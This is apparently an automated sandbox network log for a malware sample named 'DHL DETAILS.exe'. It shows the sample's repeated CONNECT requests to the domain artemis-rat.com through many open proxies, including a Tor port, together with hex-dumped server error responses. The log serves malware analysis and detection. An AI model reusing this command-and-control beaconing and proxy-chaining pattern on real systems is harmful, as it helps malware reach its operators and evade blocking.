                                                                                    Mar 9, 2024 13:14:12.948517084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.102737904 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    163192.168.2.550557104.16.108.204806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.949538946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.103811979 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    164192.168.2.550375110.12.211.140806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.970455885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.284569025 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    165192.168.2.550582104.17.16.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.977355003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.132623911 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    166192.168.2.55038446.17.63.166163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.979486942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.350884914 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    167192.168.2.550418149.102.130.120806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.982336998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.614348888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.473735094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.333461046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.833754063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    168192.168.2.55059445.12.31.140806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.983344078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.138139009 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    169192.168.2.550595104.22.14.48806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.983469963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.138453960 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    170192.168.2.55055951.81.186.179586306352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.985320091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.473690987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.067467928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.239341021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724066019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224447012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    171192.168.2.550600104.16.224.33806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.985943079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.140842915 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    172192.168.2.55043182.113.157.122312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.989892960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    173192.168.2.550337172.232.111.247806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.989892960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    174192.168.2.550615172.67.182.107806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.993132114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.147735119 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    175192.168.2.550623172.67.200.220806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.003760099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.158767939 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    176192.168.2.54975551.15.230.100163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.003861904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.004937887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036694050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.130048990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.425422907 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    177192.168.2.550631104.17.66.69806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.004401922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.159471035 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
